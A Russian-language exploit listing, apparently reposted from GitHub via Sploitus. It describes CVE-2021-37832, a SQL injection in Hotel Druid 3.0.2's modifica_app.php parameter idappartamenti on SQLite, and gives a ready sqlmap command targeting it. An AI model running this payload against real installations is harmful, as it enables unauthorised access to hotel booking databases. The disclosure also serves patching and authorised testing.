Sploitus

Exploit for CVE-2021-37832

kitploit · 2026-08-28

Exploit Code

MARKDOWN18 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DIEVUS-CVE-2021-37832
# CVE 2021-37832 Hotel Druid 3.0.2 Уязвимость SQL-инъекции

Уязвимость SQL-инъекции существует в версии 3.0.2 Hotel Druid, когда в качестве базы данных приложения используется SQLite. Злоумышленник может выполнять SQL-команды в базе данных SQLite через уязвимый параметр idappartamenti.

https://vulners.com/cve/CVE-2021-37832

https://nvd.nist.gov/vuln/detail/CVE-2021-37832#match-6858716

Уязвимая PHP-страница:

modifica_app.php - параметр idappartamenti

Эксплуатирующий пейлоад

sqlmap -u "/modifica_app.php?tipo_tabella=appartamenti&anno=2021&id_sessione=&idappartamenti=01" --level=3 --risk=2 --banner --dbms=sqlite

Обнаружено Джо Хелле, июль 2021 года